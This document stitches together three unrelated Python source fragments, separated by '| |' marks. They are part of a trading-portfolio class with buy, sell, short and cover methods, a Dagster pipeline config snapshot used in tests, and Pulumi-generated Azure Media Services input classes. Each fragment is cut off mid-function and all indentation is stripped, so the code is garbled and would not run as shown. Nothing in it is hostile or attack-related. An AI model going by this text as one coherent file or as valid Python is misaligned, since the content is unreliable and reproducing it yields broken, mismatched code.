# Updating the position if one already exists
try:
self.positions[position.key] += position
except KeyError:
self.positions[position.key] = position
# Updating the potfolio's cash reserves
self._cash -= Cash.from_position(position)
# Updating the portfolio's history to reflect purchase
self.update_positions()
self.update_history()
def sell(self, asset: Asset, quantity: float) -> None:
"""Sells a long position in this portfolio
Decrements a long position in the given asset by 'quantity'.
Maximum sale quantity is the amount owned by the portfolio.
Parameters:
asset:
The asset of the corresponding decremented position
quantity:
The sale quantity
Returns:
TODO: Return the modified position
"""
# Ensure that the transaction can occur
if not self.validate_transaction(asset, quantity):
return
# Creating the position to be sold
position = Position(asset, quantity)
# Selling the position if the current position is large enough
# to satisfy the sale quantity
try:
current = self.positions[position.key]
if current.quantity >= quantity:
self._cash += Cash.from_position(position)
self.positions[position.key] -= position
else:
raise ValueError(
f"Portfolio has insufficient long " # type: ignore[attr-defined]
f"position in asset {asset.name} "
f"{asset.type} to sell {quantity} "
f"units. Only {current} units "
"available"
)
# We can only sell positions that we own
except KeyError as e:
raise ValueError(
"Portfolio has no long position in asset " # type: ignore[attr-defined]
f"{asset.name} {asset.type}"
) from e
# Updating the portfolio's history to reflect sale
self.update_positions()
self.update_history()
def short(self, asset: Asset, quantity: float) -> None:
"""
Shorts an asset using this portfolio
Creates a short position in the given asset with a short volume given
by 'quantity'.
Parameters:
asset:
The asset in which to create a short position
quantity:
The short sale quantity
Returns:
TODO: Return the created/altered position
"""
# Ensure that the transaction can occur
if not self.validate_transaction(asset, quantity, short=True):
return
# Creating the position to be shorted
position = Position(asset, quantity, short=True)
# Updating the position if one already exists
try:
self.positions[position.key] += position
except KeyError:
self.positions[position.key] = position
# Updating the potfolio's cash reserves
self._cash -= Cash.from_position(position)
# Updating the portfolio's history to reflect short sale
self.update_positions()
self.update_history()
def cover(self, asset: Asset, quantity: float) -> None:
"""Covers a short position in this portfolio
Covers a short position in the given asset with a cover
(purchase) volume given by 'quantity'.
Parameters:
asset:
The asset in which to cover a short position
quantity:
The cover (purchase) quantity
Returns:
TODO: Return the modified position
"""
# Ensure that the transaction can occur
if not self.validate_transaction(asset, quantity, short=True):
return
# Creating the short position to be covered
position = Position(asset, quantity, short=True)
required = -1 * position.value
if required > self._cash:
raise ValueError(
f"Covering {quantity} short sold units of " # type: ignore[attr-defined]
f"{asset.name} {asset.type} requires "
f"${required}, but this portfolio only "
f"has ${self.cash} in reserve"
)
# Covering the position if the current short position is large
# enough to satisfy the quantity to cover
try:
current = self.positions[position.key]
if current.quantity >= quantity:
self.cash += Cash.from_position(position)
self.positions[position.key] -= position
else:
raise ValueError(
"Portfolio has insufficient short " # type: ignore[attr-defined]
f"position in asset {asset.name} "
f"{asset.type} to cover {quantity} "
f"units. Only {current.quantity} units"
" have been sold short"
)
# We can only cover positions that we have shorts in
except KeyError as e:
raise ValueError(
"Portfolio has no short position in " # type: ignore[attr-defined]
f"asset {asset.name} {asset.type}"
)
# Updating the portfolio's history to reflect short cover
self.update_positions()
self.update_history()
def _history(self) -> pd.DataFrame:
"""
A history of this portfolio's positions and value
Returns a datetime indexed pandas dataframe of this portfolio's
positions and total market value. This function is only used
to initialize it
Returns:
Portfolio position/value history
"""
positions = [position.view() for position in self.positions.values()]
return pd.DataFrame(
[[positions, self.value]],
columns=["POSITIONS", "VALUE"],
index=pd.DatetimeIndex([self.date], name="DATE"),
)
def update_history(self) -> None:
"""
updates this portfolio's history
TODO: Should be a private method
"""
positions = [position.view() for position in self.positions.values()]
data = np.array([positions, self.value], dtype="object")
self.history.at[self.date] = data
def reset(self) -> None:
"""Restarts the portfolio's value history"""
self.history = self._history()
def invest(self, n: float) -> None:
"""
Adds cash to this portfolio
Parameters:
n:
The quantity of cash (in the portfolio's base currency) to add
Returns:
TODO: Return the modified cash position
"""
self.cash += n
def liquidate(self, force: bool = False) -> None:
"""Sells all positions that are not the base currency/cash position"""
if not force:
for pos in self.longs.values():
self.sell(pos.asset, pos.quantity)
for pos in self.shorts.values():
self.cover(pos.asset, pos.quantity)
else:
for pos in self.longs.values():
if isinstance(pos.asset, Currency) and pos.asset.is_base:
pass
else:
self.cash += Cash.from_position(pos)
pos.quantity = 0
for pos in self.shorts.values():
self.cash += Cash.from_position(pos)
pos.quantity = 0
self.update_positions()
def get_position(
self,
asset: Asset,
short: bool = False,
positions: Optional[Iterable[Position]] = None,
) -> Optional[Position]:
"""
Gets this portfolio's current position in the given asset
Parameters:
asset:
The asset being searched
short:
Is the position short or long
positions:
The positions to be searched
Returns:
A position in the asset if found, otherwise None
"""
if positions is None:
positions = self.shorts.values() if short else self.longs.values()
result = [pos for pos in positions if pos.asset is asset]
if result:
return result[0]
return None
def get_related_positions(
self,
asset: Asset,
short: bool = False,
positions: Optional[Iterable[Position]] = None,
) -> list[Position]:
"""
Gets this portfolio's current positions in the given asset or related
to the asset
Parameters:
asset:
The asset being searched
short:
Is the position short or long
positions:
The positions to be searched
Returns:
A list of positions that are related to the asset
"""
if positions is None:
positions = self.shorts.values() if short else self.longs.values()
result = [
pos
for pos in positions
if pos.asset is asset or asset in pos.asset.__dict__.values()
]
return result
def covered_call(
self,
call: Call,
quantity: Optional[float] = None,
limit: Optional[float] = None,
) -> int:
"""
Sells calls in the given quantity, but ensures that they are 'covered'
by owning stock equal to the number of shares accounted for by the
contracts in the case of assignment
Parameters:
call:
The call to be sold short
quantity:
The quantity to sell
limit:
| |
# -*- coding: utf-8 -*-
# snapshottest: v1 - https://goo.gl/zC4yUc
from __future__ import unicode_literals
from snapshottest import Snapshot
snapshots = Snapshot()
snapshots['test_basic_dep_fan_out 1'] = '''{
"__class__": "PipelineSnapshot",
"config_schema_snapshot": {
"__class__": "ConfigSchemaSnapshot",
"all_config_snaps_by_key": {
"Any": {
"__class__": "ConfigTypeSnap",
"description": null,
"enum_values": null,
"fields": null,
"given_name": "Any",
"key": "Any",
"kind": {
"__enum__": "ConfigTypeKind.ANY"
},
"scalar_kind": null,
"type_param_keys": null
},
"Array.Shape.41de0e2d7b75524510155d0bdab8723c6feced3b": {
"__class__": "ConfigTypeSnap",
"description": "List of Array.Shape.41de0e2d7b75524510155d0bdab8723c6feced3b",
"enum_values": null,
"fields": null,
"given_name": null,
"key": "Array.Shape.41de0e2d7b75524510155d0bdab8723c6feced3b",
"kind": {
"__enum__": "ConfigTypeKind.ARRAY"
},
"scalar_kind": null,
"type_param_keys": [
"Shape.41de0e2d7b75524510155d0bdab8723c6feced3b"
]
},
"Array.String": {
"__class__": "ConfigTypeSnap",
"description": "List of Array.String",
"enum_values": null,
"fields": null,
"given_name": null,
"key": "Array.String",
"kind": {
"__enum__": "ConfigTypeKind.ARRAY"
},
"scalar_kind": null,
"type_param_keys": [
"String"
]
},
"Bool": {
"__class__": "ConfigTypeSnap",
"description": "",
"enum_values": null,
"fields": null,
"given_name": "Bool",
"key": "Bool",
"kind": {
"__enum__": "ConfigTypeKind.SCALAR"
},
"scalar_kind": {
"__enum__": "ConfigScalarKind.BOOL"
},
"type_param_keys": null
},
"Float": {
"__class__": "ConfigTypeSnap",
"description": "",
"enum_values": null,
"fields": null,
"given_name": "Float",
"key": "Float",
"kind": {
"__enum__": "ConfigTypeKind.SCALAR"
},
"scalar_kind": {
"__enum__": "ConfigScalarKind.FLOAT"
},
"type_param_keys": null
},
"Int": {
"__class__": "ConfigTypeSnap",
"description": "",
"enum_values": null,
"fields": null,
"given_name": "Int",
"key": "Int",
"kind": {
"__enum__": "ConfigTypeKind.SCALAR"
},
"scalar_kind": {
"__enum__": "ConfigScalarKind.INT"
},
"type_param_keys": null
},
"ScalarUnion.Bool-Selector.be5d518b39e86a43c5f2eecaf538c1f6c7711b59": {
"__class__": "ConfigTypeSnap",
"description": null,
"enum_values": null,
"fields": null,
"given_name": null,
"key": "ScalarUnion.Bool-Selector.be5d518b39e86a43c5f2eecaf538c1f6c7711b59",
"kind": {
"__enum__": "ConfigTypeKind.SCALAR_UNION"
},
"scalar_kind": null,
"type_param_keys": [
"Bool",
"Selector.be5d518b39e86a43c5f2eecaf538c1f6c7711b59"
]
},
"ScalarUnion.Float-Selector.d00a37e3807d37c9f69cc62997c4a5f4a176e5c3": {
"__class__": "ConfigTypeSnap",
"description": null,
"enum_values": null,
"fields": null,
"given_name": null,
"key": "ScalarUnion.Float-Selector.d00a37e3807d37c9f69cc62997c4a5f4a176e5c3",
"kind": {
"__enum__": "ConfigTypeKind.SCALAR_UNION"
},
"scalar_kind": null,
"type_param_keys": [
"Float",
"Selector.d00a37e3807d37c9f69cc62997c4a5f4a176e5c3"
]
},
"ScalarUnion.Int-Selector.a9799b971d12ace70a2d8803c883c863417d0725": {
"__class__": "ConfigTypeSnap",
"description": null,
"enum_values": null,
"fields": null,
"given_name": null,
"key": "ScalarUnion.Int-Selector.a9799b971d12ace70a2d8803c883c863417d0725",
"kind": {
"__enum__": "ConfigTypeKind.SCALAR_UNION"
},
"scalar_kind": null,
"type_param_keys": [
"Int",
"Selector.a9799b971d12ace70a2d8803c883c863417d0725"
]
},
"ScalarUnion.String-Selector.e04723c9d9937e3ab21206435b22247cfbe58269": {
"__class__": "ConfigTypeSnap",
"description": null,
"enum_values": null,
"fields": null,
"given_name": null,
"key": "ScalarUnion.String-Selector.e04723c9d9937e3ab21206435b22247cfbe58269",
"kind": {
"__enum__": "ConfigTypeKind.SCALAR_UNION"
},
"scalar_kind": null,
"type_param_keys": [
"String",
"Selector.e04723c9d9937e3ab21206435b22247cfbe58269"
]
},
"Selector.0f5471adc2ad814d1c9fd94e2fa73c07217dea47": {
"__class__": "ConfigTypeSnap",
"description": null,
"enum_values": null,
"fields": [
{
"__class__": "ConfigFieldSnap",
"default_provided": true,
"default_value_as_json_str": "{}",
"description": null,
"is_required": false,
"name": "forkserver",
"type_key": "Shape.45a8f1f21db73ecbfa5b4e07b9aedc1835cef1ef"
},
{
"__class__": "ConfigFieldSnap",
"default_provided": true,
"default_value_as_json_str": "{}",
"description": null,
"is_required": false,
"name": "spawn",
"type_key": "Shape.da39a3ee5e6b4b0d3255bfef95601890afd80709"
}
],
"given_name": null,
"key": "Selector.0f5471adc2ad814d1c9fd94e2fa73c07217dea47",
"kind": {
"__enum__": "ConfigTypeKind.SELECTOR"
},
"scalar_kind": null,
"type_param_keys": null
},
"Selector.<KEY>": {
"__class__": "ConfigTypeSnap",
"description": null,
"enum_values": null,
"fields": [
{
"__class__": "ConfigFieldSnap",
"default_provided": true,
"default_value_as_json_str": "{}",
"description": null,
"is_required": false,
"name": "disabled",
"type_key": "Shape.da39a3ee5e6b4b0d3255bfef95601890afd80709"
},
{
"__class__": "ConfigFieldSnap",
"default_provided": true,
"default_value_as_json_str": "{}",
"description": null,
"is_required": false,
"name": "enabled",
"type_key": "Shape.da39a3ee5e6b4b0d3255bfef95601890afd80709"
}
],
"given_name": null,
"key": "Selector.1bfb167aea90780aa679597800c71bd8c65ed0b2",
"kind": {
"__enum__": "ConfigTypeKind.SELECTOR"
},
"scalar_kind": null,
"type_param_keys": null
},
"Selector.a9799b971d12ace70a2d8803c883c863417d0725": {
"__class__": "ConfigTypeSnap",
"description": null,
"enum_values": null,
"fields": [
{
"__class__": "ConfigFieldSnap",
"default_provided": false,
"default_value_as_json_str": null,
"description": null,
"is_required": true,
"name": "json",
"type_key": "<KEY>"
},
{
"__class__": "ConfigFieldSnap",
"default_provided": false,
"default_value_as_json_str": null,
"description": null,
"is_required": true,
"name": "pickle",
"type_key": "<KEY>"
},
{
"__class__": "ConfigFieldSnap",
"default_provided": false,
"default_value_as_json_str": null,
"description": null,
"is_required": true,
"name": "value",
"type_key": "Int"
}
],
"given_name": null,
"key": "Selector.a9799b971d12ace70a2d8803c883c863417d0725",
"kind": {
"__enum__": "ConfigTypeKind.SELECTOR"
},
"scalar_kind": null,
"type_param_keys": null
},
"Selector.be5d518b39e86a43c5f2eecaf538c1f6c7711b59": {
"__class__": "ConfigTypeSnap",
"description": null,
"enum_values": null,
"fields": [
{
"__class__": "ConfigFieldSnap",
"default_provided": false,
"default_value_as_json_str": null,
"description": null,
"is_required": true,
"name": "json",
"type_key": "<KEY>"
},
{
"__class__": "ConfigFieldSnap",
"default_provided": false,
"default_value_as_json_str": null,
"description": null,
"is_required": true,
"name": "pickle",
"type_key": "<KEY>"
},
{
"__class__": "ConfigFieldSnap",
"default_provided": false,
"default_value_as_json_str": null,
"description": null,
"is_required": true,
"name": "value",
"type_key": "Bool"
}
],
"given_name": null,
"key": "Selector.be5d518b39e86a43c5f2eecaf538c1f6c7711b59",
"kind": {
"__enum__": "ConfigTypeKind.SELECTOR"
},
"scalar_kind": null,
"type_param_keys": null
},
"Selector.d00a37e3807d37c9f69cc62997c4a5f4a176e5c3": {
"__class__": "ConfigTypeSnap",
"description": null,
"enum_values": null,
"fields": [
{
"__class__": "ConfigFieldSnap",
"default_provided": false,
"default_value_as_json_str": null,
"description": null,
"is_required": true,
"name": "json",
"type_key": "<KEY>"
},
{
"__class__": "ConfigFieldSnap",
"default_provided": false,
"default_value_as_json_str": null,
"description": null,
"is_required": true,
"name": "pickle",
"type_key": "<KEY>"
},
{
"__class__": "ConfigFieldSnap",
"default_provided": false,
"default_value_as_json_str": null,
"description": null,
"is_required": true,
"name": "value",
"type_key": "Float"
}
],
"given_name": null,
"key": "Selector.d00a37e3807d37c9f69cc62997c4a5f4a176e5c3",
"kind": {
"__enum__": "ConfigTypeKind.SELECTOR"
},
"scalar_kind": null,
"type_param_keys": null
},
"Selector.e04723c9d9937e3ab21206435b22247cfbe58269": {
"__class__": "ConfigTypeSnap",
"description": null,
"enum_values": null,
"fields": [
{
"__class__": "ConfigFieldSnap",
"default_provided": false,
"default_value_as_json_str": null,
"description": null,
"is_required": true,
"name": "json",
"type_key": "<KEY>"
},
{
"__class__": "ConfigFieldSnap",
"default_provided": false,
"default_value_as_json_str": null,
"description": null,
"is_required": true,
"name": "pickle",
"type_key": "<KEY>"
},
{
"__class__": "ConfigFieldSnap",
"default_provided": false,
"default_value_as_json_str": null,
"description": null,
"is_required": true,
"name": "value",
"type_key": "String"
}
],
"given_name": null,
"key": "Selector.e04723c9d9937e3ab21206435b22247cfbe58269",
"kind": {
"__enum__": "ConfigTypeKind.SELECTOR"
},
"scalar_kind": null,
"type_param_keys": null
},
"Selector.e52fa3afbe531d9522fae1206f3ae9d248775742": {
"__class__": "ConfigTypeSnap",
"description": null,
"enum_values": null,
"fields": [
{
"__class__": "ConfigFieldSnap",
"default_provided": false,
"default_value_as_json_str": null,
"description": null,
"is_required": true,
"name": "json",
"type_key": "<KEY>"
},
{
"__class__": "ConfigFieldSnap",
"default_provided": false,
"default_value_as_json_str": null,
"description": null,
"is_required": true,
"name": "pickle",
"type_key": "<KEY>"
}
],
"given_name": null,
"key": "Selector.e52fa3afbe531d9522fae1206f3ae9d248775742",
"kind": {
"__enum__": "ConfigTypeKind.SELECTOR"
},
"scalar_kind": null,
"type_param_keys": null
},
"Selector.f2fe6dfdc60a1947a8f8e7cd377a012b47065bc4": {
"__class__": "ConfigTypeSnap",
"description": null,
"enum_values": null,
"fields": [
{
"__class__": "ConfigFieldSnap",
"default_provided": false,
"default_value_as_json_str": null,
"description": null,
"is_required": true,
"name": "json",
"type_key": "<KEY>"
},
{
"__class__": "ConfigFieldSnap",
"default_provided": false,
"default_value_as_json_str": null,
"description": null,
"is_required": true,
"name": "pickle",
"type_key": "<KEY>"
},
{
"__class__": "ConfigFieldSnap",
"default_provided": false,
"default_value_as_json_str": null,
"description": null,
"is_required": true,
"name": "value",
"type_key": "Any"
}
],
"given_name": null,
"key": "Selector.f2fe6dfdc60a1947a8f8e7cd377a012b47065bc4",
"kind": {
"__enum__": "ConfigTypeKind.SELECTOR"
},
"scalar_kind": null,
"type_param_keys": null
},
"Selector.fd22b7b986baf6998a8c16e63e78f44dd5e3f78f": {
"__class__": "ConfigTypeSnap",
"description": null,
"enum_values": null,
"fields": [
{
"__class__": "ConfigFieldSnap",
"default_provided": true,
"default_value_as_json_str": "{\\"config\\": {\\"retries\\": {\\"enabled\\": {}}}}",
"description": null,
"is_required": false,
"name": "in_process",
"type_key": "Shape.ca5906d9a0377218b4ee7d940ad55957afa73d1b"
},
{
"__class__": "ConfigFieldSnap",
"default_provided": true,
"default_value_as_json_str": "{\\"config\\": {\\"max_concurrent\\": 0, \\"retries\\": {\\"enabled\\": {}}}}",
"description": null,
"is_required": false,
"name": "multiprocess",
"type_key": "Shape.21277960d85eafb5579d7a10d7a715e444c5a1f7"
}
],
"given_name": null,
"key": "Selector.fd22b7b986baf6998a8c16e63e78f44dd5e3f78f",
"kind": {
"__enum__": "ConfigTypeKind.SELECTOR"
},
"scalar_kind": null,
"type_param_keys": null
},
"Shape.0bb49540f1708dcf5378009c9571eba999502e19": {
"__class__": "ConfigTypeSnap",
"description": null,
"enum_values": null,
"fields": [
{
"__class__": "ConfigFieldSnap",
"default_provided": true,
"default_value_as_json_str": "{}",
"description": null,
"is_required": false,
"name": "io_manager",
"type_key": "<KEY>"
}
],
"given_name": null,
"key": "<KEY>",
"kind": {
"__enum__": "ConfigTypeKind.STRICT_SHAPE"
},
"scalar_kind": null,
"type_param_keys": null
},
"Shape.21277960d85eafb5579d7a10d7a715e444c5a1f7": {
"__class__": "ConfigTypeSnap",
"description": null,
"enum_values": null,
"fields": [
{
"__class__": "ConfigFieldSnap",
"default_provided": true,
"default_value_as_json_str": "{\\"max_concurrent\\": 0, \\"retries\\": {\\"enabled\\": {}}}",
"description": null,
"is_required": false,
"name": "config",
"type_key": "<KEY>"
}
],
"given_name": null,
"key": "Shape.21277960d85eafb5579d7a10d7a715e444c5a1f7",
"kind": {
"__enum__": "ConfigTypeKind.STRICT_SHAPE"
},
"scalar_kind": null,
"type_param_keys": null
},
"Shape.241ac489ffa5f718db6444bae7849fb86a62e441": {
"__class__": "ConfigTypeSnap",
"description": null,
"enum_values": null,
"fields": [
{
"__class__": "ConfigFieldSnap",
"default_provided": true,
"default_value_as_json_str": "\\"INFO\\"",
"description": null,
"is_required": false,
"name": "log_level",
"type_key": "String"
},
{
"__class__": "ConfigFieldSnap",
"default_provided": true,
"default_value_as_json_str": "\\"dagster\\"",
"description": null,
"is_required": false,
"name": "name",
"type_key": "String"
}
],
"given_name": null,
"key": "Shape.241ac489ffa5f718db6444bae7849fb86a62e441",
"kind": {
"__enum__": "ConfigTypeKind.STRICT_SHAPE"
},
"scalar_kind": null,
"type_param_keys": null
},
"Shape.<KEY>": {
"__class__": "ConfigTypeSnap",
"description": null,
"enum_values": null,
"fields": [
{
"__class__": "ConfigFieldSnap",
"default_provided": true,
"default_value_as_json_str": "{\\"log_level\\": \\"INFO\\", \\"name\\": \\"dagster\\"}",
"description": null,
"is_required": false,
"name": "config",
"type_key": "Shape.241ac489ffa5f718db6444bae7849fb86a62e441"
}
],
"given_name": null,
"key": "Shape.3baab16166bacfaf4705811e64d356112fd733cb",
"kind": {
"__enum__": "ConfigTypeKind.STRICT_SHAPE"
},
"scalar_kind": null,
"type_param_keys": null
},
"Shape.41de0e2d7b75524510155d0bdab8723c6feced3b": {
"__class__": "ConfigTypeSnap",
"description": null,
"enum_values": null,
"fields": [
{
"__class__": "ConfigFieldSnap",
"default_provided": false,
"default_value_as_json_str": null,
"description": null,
"is_required": false,
"name": "result",
"type_key": "Selector.e52fa3afbe531d9522fae1206f3ae9d248775742"
}
],
"given_name": null,
"key": "Shape.41de0e2d7b75524510155d0bdab8723c6feced3b",
"kind": {
"__enum__": "ConfigTypeKind.STRICT_SHAPE"
},
"scalar_kind": null,
"type_param_keys": null
},
"Shape.4277013c8c05368bc2b9a69c9b3d0ba9a592f831": {
"__class__": "ConfigTypeSnap",
"description": null,
"enum_values": null,
"field_aliases": {
"solids": "ops"
},
"fields": [
{
"__class__": "ConfigFieldSnap",
"default_provided": true,
"default_value_as_json_str": "{\\"in_process\\": {}}",
"description": null,
"is_required": false,
"name": "execution",
"type_key": "Selector.fd22b7b986baf6998a8c16e63e78f44dd5e3f78f"
},
{
"__class__": "ConfigFieldSnap",
"default_provided": true,
"default_value_as_json_str": "{}",
"description": null,
"is_required": false,
"name": "loggers",
"type_key": "Shape.ebeaf4550c200fb540f2e1f3f2110debd8c4157c"
},
{
"__class__": "ConfigFieldSnap",
"default_provided": true,
"default_value_as_json_str": "{\\"io_manager\\": {}}",
"description": null,
"is_required": false,
"name": "resources",
"type_key": "Shape.0bb49540f1708dcf5378009c9571eba999502e19"
},
{
"__class__": "ConfigFieldSnap",
"default_provided": true,
"default_value_as_json_str": "{\\"passone\\": {}, \\"passtwo\\": {}, \\"return_one\\": {}}",
"description": null,
"is_required": false,
"name": "solids",
"type_key": "Shape.efd6e48220d7eb65a0b9e8814dd15fa00be63496"
}
],
"given_name": null,
"key": "<KEY>",
"kind": {
"__enum__": "ConfigTypeKind.STRICT_SHAPE"
},
"scalar_kind": null,
"type_param_keys": null
},
"Shape.45a8f1f21db73ecbfa5b4e07b9aedc1835cef1ef": {
"__class__": "ConfigTypeSnap",
"description": null,
"enum_values": null,
"fields": [
{
"__class__": "ConfigFieldSnap",
"default_provided": false,
"default_value_as_json_str": null,
"description": "Explicit modules to preload in the forkserver.",
"is_required": false,
"name": "preload_modules",
"type_key": "Array.String"
}
],
"given_name": null,
"key": "Shape.45a8f1f21db73ecbfa5b4e07b9aedc1835cef1ef",
"kind": {
"__enum__": "ConfigTypeKind.STRICT_SHAPE"
},
"scalar_kind": null,
"type_param_keys": null
},
"Shape.4b53b73df342381d0d05c5f36183dc99cb9676e2": {
"__class__": "ConfigTypeSnap",
"description": null,
| |
"issuer")
@issuer.setter
def issuer(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "issuer", value)
@property
@pulumi.getter(name="openIdConnectDiscoveryDocument")
def open_id_connect_discovery_document(self) -> Optional[pulumi.Input[str]]:
"""
The OpenID connect discovery document.
"""
return pulumi.get(self, "open_id_connect_discovery_document")
@open_id_connect_discovery_document.setter
def open_id_connect_discovery_document(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "open_id_connect_discovery_document", value)
@property
@pulumi.getter(name="primaryRsaTokenKeyExponent")
def primary_rsa_token_key_exponent(self) -> Optional[pulumi.Input[str]]:
"""
The RSA Parameter exponent.
"""
return pulumi.get(self, "primary_rsa_token_key_exponent")
@primary_rsa_token_key_exponent.setter
def primary_rsa_token_key_exponent(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "primary_rsa_token_key_exponent", value)
@property
@pulumi.getter(name="primaryRsaTokenKeyModulus")
def primary_rsa_token_key_modulus(self) -> Optional[pulumi.Input[str]]:
"""
The RSA Parameter modulus.
"""
return pulumi.get(self, "primary_rsa_token_key_modulus")
@primary_rsa_token_key_modulus.setter
def primary_rsa_token_key_modulus(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "primary_rsa_token_key_modulus", value)
@property
@pulumi.getter(name="primarySymmetricTokenKey")
def primary_symmetric_token_key(self) -> Optional[pulumi.Input[str]]:
"""
The key value of the key. Specifies a symmetric key for token validation.
"""
return pulumi.get(self, "primary_symmetric_token_key")
@primary_symmetric_token_key.setter
def primary_symmetric_token_key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "primary_symmetric_token_key", value)
@property
@pulumi.getter(name="primaryX509TokenKeyRaw")
def primary_x509_token_key_raw(self) -> Optional[pulumi.Input[str]]:
"""
The raw data field of a certificate in PKCS 12 format (X509Certificate2 in .NET). Specifies a certificate for token validation.
"""
return pulumi.get(self, "primary_x509_token_key_raw")
@primary_x509_token_key_raw.setter
def primary_x509_token_key_raw(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "primary_x509_token_key_raw", value)
@property
@pulumi.getter(name="requiredClaims")
def required_claims(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ContentKeyPolicyPolicyOptionTokenRestrictionRequiredClaimArgs']]]]:
"""
One or more `required_claim` blocks as defined above.
"""
return pulumi.get(self, "required_claims")
@required_claims.setter
def required_claims(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ContentKeyPolicyPolicyOptionTokenRestrictionRequiredClaimArgs']]]]):
pulumi.set(self, "required_claims", value)
@property
@pulumi.getter(name="tokenType")
def token_type(self) -> Optional[pulumi.Input[str]]:
"""
The type of token. Supported values are `Jwt` or `Swt`.
"""
return pulumi.get(self, "token_type")
@token_type.setter
def token_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "token_type", value)
@pulumi.input_type
class ContentKeyPolicyPolicyOptionTokenRestrictionRequiredClaimArgs:
def __init__(__self__, *,
type: Optional[pulumi.Input[str]] = None,
value: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] type: Token claim type.
:param pulumi.Input[str] value: Token claim value.
"""
if type is not None:
pulumi.set(__self__, "type", type)
if value is not None:
pulumi.set(__self__, "value", value)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input[str]]:
"""
Token claim type.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def value(self) -> Optional[pulumi.Input[str]]:
"""
Token claim value.
"""
return pulumi.get(self, "value")
@value.setter
def value(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "value", value)
@pulumi.input_type
class JobInputAssetArgs:
def __init__(__self__, *,
name: pulumi.Input[str],
label: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] name: The name of the input Asset. Changing this forces a new Media Job to be created.
:param pulumi.Input[str] label: A label that is assigned to a JobInputClip, that is used to satisfy a reference used in the Transform. For example, a Transform can be authored so as to take an image file with the label 'xyz' and apply it as an overlay onto the input video before it is encoded. When submitting a Job, exactly one of the JobInputs should be the image file, and it should have the label 'xyz'.
"""
pulumi.set(__self__, "name", name)
if label is not None:
pulumi.set(__self__, "label", label)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
The name of the input Asset. Changing this forces a new Media Job to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def label(self) -> Optional[pulumi.Input[str]]:
"""
A label that is assigned to a JobInputClip, that is used to satisfy a reference used in the Transform. For example, a Transform can be authored so as to take an image file with the label 'xyz' and apply it as an overlay onto the input video before it is encoded. When submitting a Job, exactly one of the JobInputs should be the image file, and it should have the label 'xyz'.
"""
return pulumi.get(self, "label")
@label.setter
def label(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "label", value)
@pulumi.input_type
class JobOutputAssetArgs:
def __init__(__self__, *,
name: pulumi.Input[str],
label: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] name: The name of the output Asset. Changing this forces a new Media Job to be created.
:param pulumi.Input[str] label: A label that is assigned to a JobOutput in order to help uniquely identify it. This is useful when your Transform has more than one TransformOutput, whereby your Job has more than one JobOutput. In such cases, when you submit the Job, you will add two or more JobOutputs, in the same order as TransformOutputs in the Transform. Subsequently, when you retrieve the Job, either through events or on a GET request, you can use the label to easily identify the JobOutput. If a label is not provided, a default value of '{presetName}_{outputIndex}' will be used, where the preset name is the name of the preset in the corresponding TransformOutput and the output index is the relative index of the this JobOutput within the Job. Note that this index is the same as the relative index of the corresponding TransformOutput within its Transform.
"""
pulumi.set(__self__, "name", name)
if label is not None:
pulumi.set(__self__, "label", label)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
The name of the output Asset. Changing this forces a new Media Job to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def label(self) -> Optional[pulumi.Input[str]]:
"""
A label that is assigned to a JobOutput in order to help uniquely identify it. This is useful when your Transform has more than one TransformOutput, whereby your Job has more than one JobOutput. In such cases, when you submit the Job, you will add two or more JobOutputs, in the same order as TransformOutputs in the Transform. Subsequently, when you retrieve the Job, either through events or on a GET request, you can use the label to easily identify the JobOutput. If a label is not provided, a default value of '{presetName}_{outputIndex}' will be used, where the preset name is the name of the preset in the corresponding TransformOutput and the output index is the relative index of the this JobOutput within the Job. Note that this index is the same as the relative index of the corresponding TransformOutput within its Transform.
"""
return pulumi.get(self, "label")
@label.setter
def label(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "label", value)
@pulumi.input_type
class LiveEventCrossSiteAccessPolicyArgs:
def __init__(__self__, *,
client_access_policy: Optional[pulumi.Input[str]] = None,
cross_domain_policy: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] client_access_policy: The content of clientaccesspolicy.xml used by Silverlight.
:param pulumi.Input[str] cross_domain_policy: The content of the Cross Domain Policy (`crossdomain.xml`).
"""
if client_access_policy is not None:
pulumi.set(__self__, "client_access_policy", client_access_policy)
if cross_domain_policy is not None:
pulumi.set(__self__, "cross_domain_policy", cross_domain_policy)
@property
@pulumi.getter(name="clientAccessPolicy")
def client_access_policy(self) -> Optional[pulumi.Input[str]]:
"""
The content of clientaccesspolicy.xml used by Silverlight.
"""
return pulumi.get(self, "client_access_policy")
@client_access_policy.setter
def client_access_policy(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "client_access_policy", value)
@property
@pulumi.getter(name="crossDomainPolicy")
def cross_domain_policy(self) -> Optional[pulumi.Input[str]]:
"""
The content of the Cross Domain Policy (`crossdomain.xml`).
"""
return pulumi.get(self, "cross_domain_policy")
@cross_domain_policy.setter
def cross_domain_policy(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cross_domain_policy", value)
@pulumi.input_type
class LiveEventEncodingArgs:
def __init__(__self__, *,
key_frame_interval: Optional[pulumi.Input[str]] = None,
preset_name: Optional[pulumi.Input[str]] = None,
stretch_mode: Optional[pulumi.Input[str]] = None,
